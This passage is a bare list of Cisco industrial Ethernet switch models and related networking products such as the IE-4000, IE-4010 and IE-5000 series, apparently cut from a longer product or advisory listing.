IE-4000-4S8P4G-E Industrial Ethernet Switch Cisco IE-4000-4T4P4G-E Industrial Ethernet Switch Cisco IE-4000-4TC4G-E Industrial Ethernet Switch Cisco IE-4000-8GS4G-E Industrial Ethernet Switch Cisco IE-4000-8GT4G-E Industrial Ethernet Switch Cisco IE-4000-8GT8GP4G-E Industrial Ethernet Switch Cisco IE-4000-8S4G-E Industrial Ethernet Switch Cisco IE-4000-8T4G-E Industrial Ethernet Switch Cisco IE-4010-16S12P Industrial Ethernet Switch Cisco IE-4010-4S24P Industrial Ethernet Switch Cisco IE-5000-12S12P-10G Industrial Ethernet Switch Cisco IE-5000-16S12P Industrial Ethernet Switch Cisco ME 4924-10GE Switch Cisco RF Gateway 10 Cisco SM-X Layer 2/3 EtherSwitch Service Module